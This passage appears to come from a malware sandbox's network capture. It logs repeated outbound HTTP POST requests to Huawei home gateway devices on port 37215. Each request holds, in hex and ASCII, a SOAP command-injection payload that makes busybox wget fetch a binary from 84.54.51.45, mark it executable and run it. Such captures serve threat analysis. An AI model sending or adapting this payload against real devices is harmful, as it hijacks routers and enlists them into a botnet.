                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1328192.168.2.1558092197.82.125.23437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730932951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1329192.168.2.1551912197.89.253.1637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730948925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1330192.168.2.1559260197.62.48.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730952024 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1331192.168.2.1538838197.163.78.237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730988979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1332192.168.2.1551580197.100.195.6937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731009007 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1333192.168.2.1538644197.168.221.7537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731038094 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1334192.168.2.1547744197.127.122.4337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731040955 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1335192.168.2.1555540197.104.9.9737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731051922 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1336192.168.2.1540472197.217.4.21437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731081009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1337192.168.2.1551642197.4.54.2937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731112003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
